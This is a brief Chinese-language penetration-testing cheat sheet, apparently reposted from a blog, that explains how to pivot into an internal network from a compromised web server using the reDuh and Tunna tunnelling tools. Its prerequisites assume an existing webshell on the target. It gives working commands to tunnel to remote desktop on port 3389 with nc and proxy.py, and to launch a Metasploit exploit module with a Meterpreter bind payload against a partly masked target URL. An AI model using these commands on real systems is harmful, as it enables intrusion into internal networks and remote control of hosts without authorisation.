1.1 https://github.com/sensepost/reDuh
下载地址: https://github.com/sensepost/reDuh
1.reDuh 使用条件
(1) 获取目标服务器 webshell, 且可以上传 reDuh 服务端对应脚本文件.
(2) 知道目标服务器开放的内网端口, 如远程桌面的端口是 3389.
(3) 目标服务器网络做了端口策略限制, 只允许外部访问内网的 80 等特定端口.
2. reDuh 使用命令
(1) 本地具备 java 环境, 可以使用 pentestbox 自带 java 环境
java -jar reDuhClient.jar http://somesite.com/reDuh.aspx http or https port
(2) 本地连接 1010 端口
nc -vv localhost 1010
(3) 在 java 命令窗口执行
[createTunnel]1234:127.0.0.1:3389
(4) 使用 mstsc 登录 127.0.0.1:1234
- 1.2 https://github.com/SECFORCE/Tunna
- https://github.com/SECFORCE/Tunna
(1) 连接 3389
python proxy.py -u http://172.0.0.1/conn.aspx -l 1234 -r 3389 -v
- cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
- msf> use exploit/windows/misc/tunna_exploit
- msf exploit(tunna_exploit)> set PAYLOAD windows/meterpreter/bind_tcp
- PAYLOAD => windows/meterpreter/bind_tcp
- msf exploit(tunna_exploit)> set RHOST 1.3.3.7 // 注意这里是指本地的公网 IP
- RHOST => 1.3.3.7
- msf exploit(tunna_exploit)> set TARGETURI http://219.x.x.x:8080/conn.jsp
- TARGETURI => http://219.x.x.x:8080/conn.jsp
来源: http://www.bubuko.com/infodetail-2586274.html